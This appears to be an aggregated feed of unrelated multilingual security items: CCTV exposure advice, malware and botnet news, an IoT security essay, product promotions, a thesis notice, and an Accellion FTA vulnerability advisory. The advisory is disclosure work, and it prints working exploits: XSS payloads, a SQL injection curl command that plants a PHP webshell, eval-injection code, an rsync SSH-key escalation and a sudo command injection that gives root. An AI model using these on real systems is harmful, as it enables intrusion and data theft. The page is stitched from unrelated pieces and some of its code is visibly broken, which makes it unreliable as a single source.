Many people clearly never change default passwords of some of the equipment viewable on the Internet. Many brands of cheap Chinese CCTV equipment also run embedded software of dubious quality with very well known exploits and hacks. Many also contain backdoor passwords, meaning that even if you change the password these devices can still be accessed by anybody with this knowledge. As many of these systems are never upgraded by installers or end users, flaws that have been fixed can often still exist for the life of the system.

The issues also extend beyond somebody snooping on your video feeds – some of these exploits can also be used to turn your hardware into a bot capable of being used for major DDoS attacks, or even turned into a tool for mining bitcoins. In September 2016 one the world’s largest DDoS attacks against krebsonsecurity was reportedly performed with the assistance of over 145,000 compromised CCTV cameras.

In my day job as a network engineer I’ve had numerous dealings with security companies who lack even basic fundamental knowledge when it comes to networking and security. Concepts of networking are something that many people will fail to grasp, with many people relying on the advice of others or a “she’ll be right” mentality rather than seeking proper advice from an expert.

There have been many threads here on Geekzone about CCTV systems and comments posted by people who have been told that “nobody knows your IP address”, “you’re on a dynamic IP address which keeps changing so nobody will find you”, “I’ll change the port to something random so they won’t find you” or “if you make your password secure you’ll be fine”. Statements like this show a fundamental lack of knowledge, and when they’ve given by people posing to be security experts, should really be raising alarm bells. Having a public IP that changes regularly or changing ports offers absolutely nothing in the way of security. Likewise having a secure password is meaningless if a backdoor master password exists on your device.

If you’re wanting remote access to most hardware on an internal network there is only one safe way to do this – by using a Virtual Private Network (VPN). By using an appropriate router with a built in VPN server you can connect your remote PC or phone via VPN and then safely browse your cameras with no risk of your cameras or data being exposed to the entire Internet. If access is only required from specific connections then you could also look to restrict access to a locked down range of public IP addresses to ensure your cameras are not unnecessarily exposed.

If you have an IP camera, NVR or DVR that’s exposed to the Internet using port forwards or you have UPnP enabled you should be taking immediate steps to secure it. If your knowledge of networking doesn’t extend to configuring a VPN then you should be disabling remote access and/or UPnP until such time as you are able to implement a VPN or lock down access to specific IP ranges.

If your security or CCTV installer has no issues with allowing port forwards then you should be on the lookout for a new installer. You’re not just compromising your own safety and security, you’re also compromising the safety, security and end user experience of everybody on the Internet if your hardware can be compromised and used as a bot for DDoS attacks.


          Podcast Canaltech - 10/07/2014        

Trolls de patentes, Slingshot não decola, Google anuncia 'jeitinho' para fazer apps rodarem no Wear, TV que se 'enrola' da LG, Brasil afetado pelas botnets, iPhone com sistema háptico
          Cyber Attack Code kills infected PCs        
The botnet-driven cyber attack on government, financial, and media sites in the U.S and South Korea includes a newly discovered danger: The malicious code responsible for driving the distributed denial of service attack, known as W32.Dozer, is designed to delete data on infected computers and to prevent the computers from being rebooted, a shocking revelation made today by Network Computing.

The malicious code includes instructions to start deleting files when the infected computer's internal clock reached July 10, 2009. "Your machine is completely hosed at this stage," said Vincent Weafer, VP at Symantec Security Response.

According to Weafer, the malicious code will attempt to locate files with any of more than 30 different extensions, such as .doc, .pdf, and .xls, copy the data to an encrypted file that's inaccessible to the user, and then overwrite the data in the original files. It targets files associated with office, business, and development applications. The malicious code is also programmed to modify infected computers' Master Boot Records. The change renders computers inoperable following any attempt to reboot.

The impact of this self-destruct sequence should be minimal, however. Weafer said that he expects only a few thousand machines will be damaged. "I don't expect this to be a major issue, except perhaps in South Korea," he said.

The South Korean Intelligence Service estimated that about 20,000 compromised computers —mostly in South Korea—had been ordered to conduct a Distributed Denial of Service (DDoS) attack on U.S. and South Korean sites. Given the timing, which coincided with a North Korean missile test, suspicions have been raised about the involvement of hackers in North Korea or possibly China.

          Suspected Russian botnet mastermind is arrested        
Suspected Russian botnet mastermind is arrested
Global cybercrime network attacked tens of thousands of computers
          IoT設備商別成為幫兇 從Dyn DDoS攻擊事件看IoT安全        

萬物皆聯網成為萬物皆可駭

2016年10月21日知名網路服務 Dyn 遭受殭屍網路發動三波巨大規模 DDoS 攻擊,世界各大網站服務皆因為此攻擊而中斷,包括 Amazon、Twitter、Github、PayPal 等大型網站都因此受到影響。資安人員研究發現,本次 DDoS 攻擊的發起者未明,但多數攻擊流量來自殭屍網路「Mirai」,利用 IPCAM、CCTV、DVR、IoT 裝置等系統進行 DDoS 攻擊。為什麼這些設備會成為攻擊的幫凶呢?我們又該如何自保呢?

一個攻擊事件,一定有背後的原因。攻擊者一定是有所求,才會進行攻擊,可能是求名、求利或求樂趣。因為 DDoS 攻擊會直接影響目標系統的運作,對系統營運造成影響,在黑色產業的循環中通常會利用這種攻擊來勒索錢財。例如針對營運線上遊戲的公司進行 DDoS 攻擊,讓遊戲服務中斷,逼迫企業將主機的連線花錢「贖」回來。但 Dyn 這次的事件各家都沒有收到類似的勒索信,因此資安專家們推測,這可能是一次練兵,或者甚至是 DDoS 攻擊服務的行銷手法。如果我們用黑色產業的角度去思考一個攻擊行為,就會有截然不同的看法。試想,如果這是一次駭客組織的商業行銷行為,目的是展現這個團隊的 DDoS 攻擊火力,這樣的成果是否可以稱作是一個成功案例呢?如果你是服務購買者,是否對這樣的服務有信心呢?

利用 IoT 裝置及網通設備佈建殭屍網路 (botnet) 已經不是新聞。Internet Census 2012 是一次資安圈的大事件,一個稱為 Carna 的 botnet 利用了全世界 42 萬台裝置,掃描全世界整個 IPv4 設備,蒐集 IP 使用狀況、連接埠、服務標頭等資訊,並且提供共計 9TB 資料開放下載研究。而這個 botnet 多數利用路由器 (router) 的漏洞,利用預設密碼、空密碼登入設備,植入後門供攻擊者控制。而後的幾次大型攻擊事件都與 IoT 及嵌入式裝置有關係,讓 IoT 的口號「萬物皆聯網」成為「萬物皆可駭」,也讓資安研究人員對於研究這類型設備趨之若鶩。近年智慧車輛不斷發展,國際間也不少智慧車輛被駭的事件。車輛被駭影響的就不單是資訊系統,更會波及人身安全甚至整個城市的交通,資安考量的影響也遠比以前嚴重。

連網裝置成為駭客下手的主要原因

究竟是怎樣的安全漏洞讓攻擊者這麼輕易利用呢?目前攻擊者及 botnet 多數利用的還是使用預設密碼、或甚至是沒有設定密碼的裝置。網站 Insecam 揭露了全世界數萬支未修改密碼的攝影機,再再顯示不少民眾或公司行號購買了監視器,卻沒有健全的資安意識,讓監視器暴露於全世界之中。更多攝影機、監視器等的資安議題可以參考我們的文章「網路攝影機、DVR、NVR 的資安議題 - 你知道我在看你嗎?」。除了預設密碼之外,設備中的後門也是一個大問題。不少路由器、無線基地台廠商被爆出系統中含有測試用的登入帳號,該帳號無法關閉、無法移除,且容易被攻擊者進行研究取得。除了等待廠商升級韌體來修補該問題之外,沒有其他解法,因此成為攻擊者大量取得控制權的方式之一。

IoT 裝置為什麼會成為攻擊者下手的目標呢?我們可以分成幾點來探討。

第一,嵌入式裝置以往的設計都是不連網,IoT 的風潮興起之後,各廠商也為了搶市場先機,加速推出產品,將原本的產品加上網路功能,甚至 App 控制功能。而求快的結果就是犧牲資安考量,加上廠商可能原本並非網路專長,也沒有足夠的資安人員檢視安全性,導致設計出來的產品資安漏洞層出不窮。產品的設計必須嚴守 Security by Design 的原則,在開發初期的每個環節都納入資安考量,並且遵守 Secure Coding 規範,避免在產品後期疊床架屋,造成要釐清資安問題的根源更難如登天。

第二,產品的更新機制問題。IoT 裝置的更新機制在早期並沒有謹慎考量,需要使用者自行下載韌體更新,甚至有些裝置必須回廠才能進行更新。不少使用者只要產品沒有出問題,並不會主動進行韌體更新,甚至覺得更新只會造成更多問題。在沒有便利更新機制的情況之下,設備的資安問題更難以被妥善處理。近期因為資安事件頻傳,FOTA (Firmware Over-The-Air) 機制才逐漸被重視,但其他資安問題也隨即而來。如何確保韌體的完整性?如何防止攻擊者下載韌體進行研究修改?這些都是廠商需要不斷去反覆思量的。

第三,敵暗我明,也是我們認為最重要的一點。我們認為資安就是攻擊者與防禦者的一場資訊不對稱戰爭,防禦者(廠商)通常只會憑藉著自己的知識跟想像進行防禦,但卻不知道攻擊者的思維跟手法。就像春秋時代公輸般,建造雲梯協助楚國攻擊宋國的城池。唯有了解攻擊者,化解這個不對稱的資訊,才能有效的進行防禦,如同墨子了解雲梯的攻擊方式,模擬各種對應防禦的手法,才成功讓楚王放棄攻擊。不僅是 IoT 廠商,所有企業都必須了解攻擊者的思維、手法,知曉這個黑色產業的運作,甚至針對攻擊的方式進行模擬演練,將每一個防禦的缺口補足,才可以正面迎戰攻擊者。

設備商避免成為幫凶,消費者也應自保

身為使用者,我們該如何確認自己的設備有沒有被感染呢?若被感染該怎麼有效清除呢?建議先搜尋網路上目前已公開有漏洞的廠牌及型號,若在問題清單之內,先將整台設備備份設定後,回復原廠初始設定,以確保攻擊者放置的惡意程式都被清除。接著更新廠商所釋出的新版韌體,並記得在更新安裝完畢後立即更換密碼以防二度被入侵。若廠商無釋出更新,可能是資安不被重視,也可能是廠商已經結束營運。如果還是選擇要使用這個設備,建議將設備轉放在內部網路,或者是在前面增加防禦設備,避免攻擊者入侵。

至於廠商該怎麼跟上資安的腳步呢?我們認為目前廠商最重要的就是資安意識。這已經是老生常談,以往網路產業逐漸重視資安,但跨入網路的其他資訊產業恐怕還沒意識到資安的嚴重性。凡舉傳統家電轉為智慧家電、車輛轉為智慧車輛、甚至基礎建設也逐漸資訊化的現在,若這些踏入網路的產業沒有相對應的資安意識,恐怕很難在初期就預防風險的發生。企業也必須盤點風險的所在,透過人工滲透測試模擬攻擊者的攻擊思維及路徑,如同軍事演習一般,將入侵的途徑一一封鎖。我們認為 IoT 等嵌入式裝置、智慧家電、甚至網通資安設備本身,未來都會是駭客組織攻擊的對象,利用更新的困難度跟管理者的疏於管理,建置一個個大規模殭屍大軍,成為未來戰爭的棋子。我們期許未來廠商建構產品時,都能優先納入資安考量,不成為黑色產業的幫凶,也讓國際認可台灣產品是資安至上的優良品質。


          Advisory: Accellion File Transfer Appliance Vulnerability        

By Orange Tsai

English Version
中文版本


About Accellion FTA


Accellion File Transfer Appliance (FTA) is a secure file transfer service which enables users to share and sync files online with AES 128/256 encryption. The Enterprise version further incorporates SSL VPN services with integration of Single Sign-on mechanisms like AD, LDAP and Kerberos.

Vulnerability Details


In this research, the following vulnerabilities were discovered on the FTA version FTA_9_12_0 (13-Oct-2015 Release)

  • Cross-Site Scripting x 3
  • Pre-Auth SQL Injection leads to Remote Code Execution
  • Known-Secret-Key leads to Remote Code Execution
  • Local Privilege Escalation x 2

The above-mentioned vulnerabilities allow unauthenticated attackers to remotely attack FTA servers and gain highest privileges successfully. After the attackers fully controlled the servers, they will be able to retrieve the encrypted files and user data, etc.

After reporting to CERT/CC, these vulnerabilities were assigned 4 CVEs (CVE-2016-2350, CVE-2016-2351, CVE-2016-2352, CVE-2016-2353).

Areas Affected


According to a public data reconnaissance, there are currently 1,217 FTA servers online around the world, most of which are located in the US, followed by Canada, Australia, UK, and Singapore.
Determine from the domain name and SSL Certificate of these servers, FTA is widely used by governmental bodies, educational institutions, enterprises, including several well-known brands.

Vulnerability Analysis and Exploitation


Multiple Cross-Site Scripting (CVE-2016-2350)

1. XSS in move_partition_frame.html

https://<fta>/courier/move_partition_frame.html
?f2=’-prompt(document.domain);//

2. XSS in getimageajax.php

https://<fta>/courier/web/getimageajax.php
?documentname=”onerror=”prompt(document.domain)//

3. XSS in wmInfo.html

https://<fta>/courier/web/wmInfo.html
?msg=ssologout
&loginurl=”><svg/onload=”prompt(document.domain)


Pre-Auth SQL Injection leads to RCE (CVE-2016-2351)

After code reviewing, a pre-authentication SQL Injection vulnerability was found in FTA. This vulnerability grants malicious users access to sensitive data and personal information on the server through SQL Injection, and launch remote code execution (RCE) by further exploiting privilege-escalating vulnerabilities.
The key to this problem lies in the client_properties( ... ) function called by security_key2.api!

/home/seos/courier/security_key2.api
// ...
$password = _decrypt( $password, _generate_key( $g_app_id, $client_id, $g_username ) );
opendb();
$client_info = client_properties( $client_id )[0];
// ...

Among these parameters, $g_app_id $g_username $client_id and $password are controllable by the attackers. And although the function _decrypt( ... ) handles the passwords, it does not involve in the triggering of the vulnerability.
One thing to pay special attention is that the value of $g_app_id will be treated as a global variable which represents the current Application ID in use, and will be applied in opendb( ) accordingly. The code in opendb( ) includes the following lines:

$db = DB_MASTER . $g_app_id;
if(!@mysql_select_db( $db ))

In mysql_select_db, the name of the database to be opened is controllable by the user. If wrong value was given, the program will be interrupted. Therefore, $g_app_id must be forged correctly.

The following lines are the most important function client_properties( $client_id ).

function client_properties($client_id = '', $user = '', $manager = '', $client_type = 0, $client_name = '', $order_by = 'client_id', $order_type = 'a', $limit = '', $offset = '', $exclude_del = 1, $user_type = '', $user_status = '') {
    $sql = ($user_type  = '' ? 'SELECT t_mail_server.* FROM t_mail_server ' : 'SELECT t_mail_server.*, t_profile.c_flag as profile_flag FROM t_mail_server, t_profile ');
    $filter['client_id'] = $client_id;
    $filter['client_name'] = $client_name;
    $filter['client_type'] = $client_type;
    $filter['user'] = mysql_escape_like( $user );
    $filter['user_type'] = $user_type;
    $filter['manager'] = $manager;
    $filter['user_status'] = $user_status;
    $sql &= construct_where_clause( $filter, $exclude_del );

    // ...

    $result = array(  );
    @mysql_query( $sql );
    ( $db_result =  || fatal_error( 'exec:mysql_query(' . $sql . ') respond:' . mysql_error(  ), __FILE__, 221 ) );
function construct_where_clause($filter, $exclude_del = 1) {
    $where_clause = array(  );
    $where_clause[] = 'c_server_id  != \'999\'';

    if ($exclude_del) {
        $where_clause[] = '!(t_mail_server.c_flag & ' . CLIENT_DELETED . ')';
    }
    if ($filter['client_id'] != '') {
        $where_clause[] = 'c_server_id = \'' . $filter['client_id'] . '\'';
    }
    if ($filter['manager'] != '') {
        $filter['manager'] = mysql_real_escape_string( $filter['manager'] );
        $where_clause[] = 'c_manager = \'' . $filter['manager'] . '\'';
    }
    if ($filter['client_name'] != '') {
        $filter['client_name'] = mysql_real_escape_string( $filter['client_name'] );
        $where_clause[] = 't_mail_server.c_name LIKE \'%' . $filter['client_name'] . '%\'';
    }
    if (( $filter['user'] != '' && $filter['user'] != '%%' )) {
        $filter['user'] = mysql_real_escape_string( $filter['user'] );
        $where_clause[] = 't_mail_server.c_user_id LIKE \'' . $filter['user'] . '\'';
    }

The parameters passed onto the function client_properties( ... ) will be assembled into SQL statements. Among all the functions joining the assembling, construct_where_clause( ... ) is the most crucial one.
In the function construct_where_clause( ... ), every parameter is protected by the string mysql_real_escape_string except for $client_id. Judging from the coding style of the source code, it might be a result of oversight. Therefore, SQL Injection can be triggered by sending out corresponding parameters according to the program flow.

In addition, FTA database user has root privileges with FILE_PRIV option enabled. By exploiting INTO OUTFILE and writing their own PHP code to write-enabled directory, user will be able to execute code remotely!

PoC

$ curl https://<fta>/courier/1000@/security_key2.api -d "aid=1000&user_id=1&password=1&client_id=' OR 1=1 LIMIT 1 INTO OUTFILE '/home/seos/courier/themes/templates/.cc.php' LINES TERMINATED BY 0x3c3f...#"

The created PHP file will be located at

http://<fta>/courier/themes/templates/.cc.php


Known-Secret-Key leads to Remote Code Execution

In the previous vulnerability, one requirement to execute code remotely is the existence of a write-enabled directory for injecting webshell. But in reality, chances are there is no write-enabled directory available, thus fail to execute code through SQL Injection. But there is another way to help us accomplish RCE.

The precondition of this vulnerability is Known-Secret-Key stored in the database

This is not a problem, since the database can be accessed with the SQL Injection vulnerability mentioned earlier. Also, although there are some parameter filters in the code, they can be bypassed!

/home/seos/courier/sfUtils.api
$func_call = decrypt( $_POST['fc'] );
$orig_func = '';
if (preg_match( '/(.+)\(.*\)/', $func_call, $func_match )) {
    $orig_func = $func_call;
    $func_call = $func_match[1];
}
$cs_method = array( 'delete_session_cache', 'delete_user_contact', 'valid_password', 'user_password_update_disallowed', 'user_password_format_disallowed', 'get_user_contact_list', 'user_email_verified', 'user_exist_allow_direct_download', 'user_profile_auth' );
if (( !$func_call || !in_array( $func_call, $cs_method ) )) {
    return false;
}
if ($orig_func) {
    $func_call = $orig_func;
}
if ($func_call  == 'get_user_contact_list') {
    if (!$_csinfo['user_id']) {
        return false;
    }
    if (preg_match( '/[\\\/"\*\:\?\<\>\|&]/', $_POST['name'] )) {
        return false;
    }
    $func_call = 'echo(count(' . $func_call . '("' . $_csinfo['user_id'] . '", array("nickname"=>"' . addslashes( $_POST['name'] ) . '"))));';
} else {
    if (isset( $_POST['p1'] )) {
        $func_param = array(  );
        $p_no = 7;

        while (isset( $_POST['p' . $p_no] )) {
            $func_param[] = str_replace( '\'', '\\\'', str_replace( '$', '\\$', addslashes( $_POST['p' . $p_no] ) ) );
            ++$p_no;
        }
        $func_call = 'echo(' . $func_call . '("' . join( '", "', $func_param ) . '"));';
    }
}
echo @eval( $func_call );

If Known-Secret-Key has been acquired, the output of decrypt( $_POST[fc] ) will be controllable. And despite that the succeeding regular expressions work as a function name whitelist filter, they do not filter parameters.
Therefore, the only restriction for injecting random codes in the parameters is to exclude ( ) in the strings. But thanks to the flexible characteristic of PHP, there are lots of ways to manipulate, just to name two examples here.


Execute system commands directly by using backticks (`)

user_profile_auth(`$_POST[cmd]`);

A more elegant way: use the syntax INCLUDE to include the tmp_name of the uploaded files, so that any protection will give way.

user_profile_auth(include $_FILES[file][tmp_name]);


Local Privilege Escalation (CVE-2016-2352 and CVE-2016-2353)

After gaining PHP page privileges, we discovered that the privileges were assigned to user nobody. In order to engage in advanced recon, the web environment had been observed. After the observation, two possible privilege escalation vulnerabilities were identified.

1. Incorrect Rsync Configuration
/etc/opt/rsyncd.conf
log file = /home/soggycat/log/kennel.log
...
[soggycat]
path = /home/soggycat
uid = soggycat
read only = false
list = false
...

The module name soggycat is readable and writable to anyone for the directory /home/soggycat/, therefore the SSH Key can be written into /home/soggycat/.ssh/ and then use the soggycat credential to login.

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

bash-3.2$ rsync 0::soggycat/.ssh/
drwx------        4096 2016/01/29 18:13:41 .
-rw-r--r--         606 2016/01/29 18:13:41 authorized_keys

bash-3.2$ rsync 0::soggycat/.ssh/authorized_keys .
bash-3.2$ cat id_dsa.pub >> authorized_keys
bash-3.2$ rsync authorized_keys 0::soggycat/.ssh/

bash-3.2$ ssh -i id_dsa -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no soggycat@localhost id
Could not create directory '/.ssh'.
Warning: Permanently added '0,0.0.0.0' (RSA) to the list of known hosts.
uid=520(soggycat) gid=99(nobody) groups=99(nobody)


2. Command Injection in “yum-client.pl”

To enable system updates through web UI, the sudoers configuration in FTA exceptionally allows the user nobody to directly execute commands with root privileges and update software with the program yum-client.pl.

/etc/sudoers
...
Cmnd_Alias      YUM_UPGRADE = /usr/bin/yum -y upgrade
Cmnd_Alias      YUM_CLIENT = /usr/local/bin/yum-client.pl
...
# User privilege specification
root     ALL=(ALL) ALL
admin    ALL =NOPASSWD: UPDATE_DNS, UPDATE_GW, UPDATE_NTP, RESTART_NETWORK, CHMOD_OLDTEMP ...
nobody   ALL =NOPASSWD: SSL_SYSTEM, ADMIN_SYSTEM, IPSEC_CMD, YUM_CLIENT
soggycat ALL =NOPASSWD: ADMIN_SYSTEM, IPSEC_CMD, CHOWN_IPSEC, UPDATE_IPSEC, YUM_CLIENT
radmin   ALL =NOPASSWD: RESET_APPL
...


YUM_CLIENT is the command for proceeding updates. Part of the codes are as follows:

/usr/local/bin/yum-client.pl
...
GetOptions (
   'help' => \$help,
   'download_only' => \$download_only,
   'list' => \$list,
   'cache' => \$cache,
   'clearcache' => \$clearcache,
   'cdrom=s' => \$cdrom,
   'appid=s' => \$appid,
   'servername=s' => \$servername,
   'version=s' => \$version,
   'token=s' => \$token);

my $YUM_CMD = "/usr/bin/yum";
if ($cache){
  $YUM_CMD = "$YUM_CMD -C";
}

# if this is based on RHEL 5, change the repository
my $OS = `grep -q 5 /etc/redhat-release && echo -n 5`;
my $LOGFILE = "/home/seos/log/yum-client.log";
my $STATUSFILE = "/home/seos/log/yum-client.status";
my $YUMCONFIG = "/etc/yum.conf";
my $YUMDIFF_FILE = '/home/seos/log/yum.diff';

if ($cdrom){
  if ($OS eq "5"){
     $YUM_CMD = "$YUM_CMD -c $cdrom_path/yum.conf-5";
  }else{
     $YUM_CMD = "$YUM_CMD -c $cdrom_path/yum.conf";
  }
  system("mkdir -p /mnt/cdrom && mount -o loop $cdrom $cdrom_path") == 0 or fdielog($LOGFILE,"unable to mount: $!");
}

After taking a closer look on ymm-client.pl, a Command Injection vulnerability was found on the parameter --cdrom. This vulnerability enables attackers to inject any commands into the parameter and execute as root.

Thus, using the commands below

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

bash-3.2$ sudo /usr/local/bin/yum-client.pl --cdrom='$(id > /tmp/.gg)'

mount: can't find /mnt/cdrom in /etc/fstab or /etc/mtab
unable to mount: Bad file descriptor at /usr/local/bin/yum-client.pl line 113.

bash-3.2$ cat /tmp/.gg
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

will grant execution freely as root!

Backdoor


After gaining the highest privilege and carrying out server recon, we identified that several backdoors had been already planted in FTA hosts. One of them is an IRC Botnet which had been mentioned in Niara’s Accellion File Transfer Appliance Vulnerability.
Apart from that, two additional PHP Webshells of different types which had NEVER been noted in public reports were also identified. Through reviewing Apache Log, these backdoors might be placed by exploiting the CVE-2015-2857 vulnerability discovered in mid-2015.

One of the backdoors is PHPSPY, it is found on 62 of the online hosts globally. It was placed in

https://<fta>/courier/themes/templates/Redirector_Cache.php

The other is WSO, found on 9 of the online hosts globally, placed in

https://<fta>/courier/themes/templates/imag.php


Acknowledgement


The vulnerability mentioned in this Advisory was identified in early 2016 while looking for vulnerabilities in Facebook, you can refer to the article “How I Hacked Facebook, and Found Someone’s Backdoor Script”.
Upon discovering the FTA vulnerability in early February, I notified Facebook and Accellion and both were very responsive. Accellion responded immediately, issuing patch FTA_9_12_40 on February 12th and notifying all affected customers about the vulnerability and instructions to install the patch. Accellion has been very communicative and cooperative throughout this process.

Timeline

  • Feb 6, 2016 05:21 Contact Accellion for vulnerability report
  • Feb 7, 2016 12:35 Send the report to Accellion Support Team
  • Mar 3, 2016 03:03 Accellion Support Team notifies patch will be made in FTA_9_12_40
  • May 10, 2016 15:18 Request Advisory submission approval and report the new discovery of two backdoors to Accellion
  • Jun 6, 2016 10:20 Advisory finalized by mutual consent

References


          Malware (Vírus) Cria Rede Zumbi com Quase 300 mil Dispositivos Inteligentes        


Pesquisadores de segurança da Kaspersky descobriram nesta semana um Malware/Vírus que afeta dispositivos inteligentes. Chamado de Hajime, o Malware cria uma rede zumbi usando aparelhos como eletrodomésticos. Segundo os especialistas, já foram afetados quase 300 mil dispositivos.
Por enquanto, foram encontrados indícios do arquivo malicioso em DVRs, webcams e roteadores, mas ele pode afetar qualquer aparelho que tenha acesso à internet. Uma vez que são infectados, os dispositivos passam a fazer parte de uma botnet controlada por outra pessoa sem que o dono saiba.
A Kaspersky indica que o problema tem afetado o Irã, Vietnã e Brasil. A empresa ressaltou que essas redes geralmente são usadas para ataques DDoS e envio de spam.
Por enquanto, não se sabe qual é o propósito da rede zumbi, que continua crescendo. "A botnet está ficando cada vez maior, mas seu objetivo permanece desconhecido. Não encontramos vestígios de qualquer tipo de ataque ou atividade maliciosa", revela Konstantin Zykov, pesquisador da Kaspersky.
Se Proteja: A empresa indica que os usuários alterem suas senhas e atualizem o firmware dos dispositivos.

          iPhone: Device Paired Tool para saber qué iPhone o iPad se conectó a tu Windows o macOS y protegerte        
Ya por todos es conocido el riesgo que existe cuando un iPhone es conectado a un equipo. Desde el equipo pareado con el terminal iPhone se pueden hacer muchos ataques a iPhone para robarle datos, troyanizarlo, etcétera. Una de las debilidades conocidas por todos.

Figura 1: iPhone: Device Paired Tool para saber qué
iPhone o iPad se conectó a tu Windows o macOS y protegerte

Como ya sabéis, hace ya más de tres años impartí una charla en la que hablaba precisamente de esto. De que cuando se parea un terminal iPhone con un equipo Windows, la seguridad del terminal queda delegada a la seguridad del terminal Windows.


Figura 2: Tu iPhone es tan (IN)seguro como tu Windows 

Sobre este tema estuve hablando con mi amigo Kevin Mitnick por una vídeo conferencia hace ya un par de años cuando estaba escribiendo su última novela titulada "The art of invisibility". Este fue uno de los cosas que surgió y nos preguntamos cómo revisar un equipo para saber qué terminales iPhone se conectaban allí o lo que es lo mismo, cuáles son los terminales que estarían pareados y que han dado una prioridad especial al equipo.


Con esto en mente, y teniendo en mente la publicación de la 2ª Edición del libro de Hacking iOS: iPhone & iPad, le pedí a mis compañeros que hicieran una pequeña herramienta para poder no solo revisar la lista de dispositivos pareados, sino también que se pudieran eliminar esas claves.
Así surgió primero el módulo de Metasploit que hizo Pablo González (@pablogonzalezpe) para, una vez llegado a un equipo, buscar estos dispositivos pareados, tal y como vimos en el artículo ¿Qué dispositivos iOS se han pareado con este Windows o macOS?.

Figura 5: Módulo iPhone Pairing Detector para Metasploit

Y para los usuarios de Windows y macOS, mis compañeros Rodolfo Bordón y Ioseba Palop hicieron sendas herramientas para los dos sistemas operativos que se llamaron Device Paired Tool.

Figura 6: Device Paired Tool en ElevenPaths para Windows y macOS

Su funcionamiento es muy sencillo. Se instala en tu Windows o macOS y accediendo a la herramienta se puede ver la lista de todos los dispositivos que se han pareado al equipo, además de que se pueden borrar en cualquier momento las claves de pareado.

Figura 7: Lista de dispositivos iOS conectados a un macOS

Pero además, se queda residente y cuando se desconecta cualquier terminal iPhone o iPad permite hacer un despareado seguro, eliminado de manera automática todas las claves de pareado que se han generado.

Figura 8: Dispositivo despareado. ¿Eliminar claves?

Son unas pequeñas tools que hicimos desde el laboratorio de ElevenPaths, y las podéis descargar ahora para usarlas en vuestro día a día. Si tenéis que conectar un iPhone o un iPad a cualquier equipo, no os olvidéis de eliminar esas claves cuando lo desconectes. Por tu seguridad.

Saludos Malignos!

          mASSAP: Controla en tiempo real la seguridad de las apps móviles        
Hace ya tiempo que os hablé de Path6, el servicio que habíamos diseñado en ElevenPaths para controlar en tiempo real la seguridad de las apps móviles publicadas en los markets de iOS y Android. La idea es poder saber en tiempo real cuáles son las vulnerabilidades que tienen tanto las apps de tu empresa como las apps que tienes aprobadas en las listas blancas de los MDM para poder actuar en consecuencia.

Figura 1: mASSAP: Controla en tiempo real la seguridad de las apps móviles

El proyecto se construyó sobre la base de Tacyt [Codename Path5] y recibió el Codename Path6, con el que lo presentamos en el pasado Security Innovation Day 2016 en Madrid, con unos casos de uso muy claros, y aún si tener asignado su nombre.


Figura 2: Presentación de Path6 en el Security Innovation Day 2016

Con el paso del tiempo, el producto se hizo mayor y paso de la fase de alpha, a beta, y de beta a versión final con el nombre de "mASAPP" y pudimos verlo en acción en el Security Day 2017, donde nuestro compañero Víctor Mundilla lo presentó.


Figura 3: ¿Qué fue de Path6? Hola mASAPP

Hoy en día el producto ya cuenta con muchos clientes, y lo contamos tal y como se ve en el siguiente vídeo promocional de mASAP.


Figura 4: Vídeo promocional de mASSAP

Pero queríamos dar un paso más y que los técnicos pudieran entender los detalles del mismo, así que hemos hecho una ElevenPaths Talk especial que acaba de ser publicada, y que os dejo por aquí para que podáis ver en detalle su funcionamiento y sus últimas novedades.


Figura 5: ElevenPaths Talk sobre "mASAPP"

Si quieres conocer más de este producto puedes visitar la página de mASAPP en la web de ElevenPaths y pedir una prueba del mismo a través de nuestro formulario de contacto.

Saludos Malignos!

          Winnti Hackers Use GitHub to Control Botnet        
none
          Kommentar zu Hacker kapert angeblich 150.000 Netzwerkdrucker von tkahner        
Das ist sicherlich kein "flammendes Botnet" sondern ein "beleidigendes Botnet", was auch mehr Sinn macht . Flame-Wars sind ja auch keine Flammenkriege sondern ein verbaler Schlagabtausch auf beleidigendem Niveau
          Besuch vom freundlichen Botnet aus China        
Am Donnerstag musste ich schmerzhaft lernen, das es keine gute Idee ist ein Wiki mit offener Registrierung und freiem editieren auf dem Server liegen zu haben. Donnerstag halb Sechs in Deutschland und der Server ist bei 300%-400% Auslastung. Nach etwas … Weiterlesen
          Antivirus A Trojan who steals passwords and banking data        
It seems that the danger is not going to end: The Zeus has learned a botnet. It steals account information and it forwards them to criminals: trade secrets are also at risk. We asked several security experts how real the threat really is, best antivirus programs detect this virus from the begining. The malicious software […]
          ZeroAccess Botnet Down, But Not Out        
Authorities in Europe joined Microsoft Corp. this week in disrupting "ZeroAccess," a vast botnet that has enslaved more than two million PCs with malicious software in an elaborate and lucrative scheme to defraud online advertisers.
          Reddit Suffers Major DDoS        
  Reddit Slammed By Massive Online Attack         ” Reddit suffered a massive distributed denial-of-service (DDoS) attack Friday that stretched into the afternoon. At 6:02 A.M., the Reddit status twitter account tweeted that the website was working to recover from what appeared to be a DDoS. A DDoS is when a botnet is sent out to cripple […]
          Massive cyberattack the result of malware-infected IoT devices        
The widespread internet outage that affected a number of the US’s biggest websites on Friday was the result of a huge distributed denial of service (DDoS) attack on Dyn, a domain name registration provider. Now security expert Brian Krebs, of Krebs on Security, has reported that the attack was carried out through the use of a botnet using the Mirai … Continue reading
          Aug 21, 2017: PhD Thesis Defense: Techniques and Solutions for Addressing Ransomware Attacks        

Title: Techniques and Solutions for Addressing Ransomware Attacks

Speaker: Amin Kharraz, PhD Candidate, College of Computer and Information Science at Northeastern University

Location: Northeastern University, 805 Columbus Avenue, Interdisciplinary Science and Engineering Complex (ISEC), 6th Floor, Room #601, Boston, Massachusetts 02120

Abstract

Ransomware is a form of extortion-based attack that locks the victim’s digital resources and requests money to release them. Although the concept of ransomware is not new (i.e., such attacks date back at least as far as the 1980's), this type of malware has recently experienced a resurgence in popularity. In fact, over the last few years, a number of high-profile ransomware attacks were reported. Very recently, WannaCry ransomware infected thousands of vulnerable machines around the world, and substantially disrupted critical services such as British healthcare system. Given the size and variety of threats we are facing today, having solutions to effectively detect and analyze unknown ransomware attacks seems necessary.

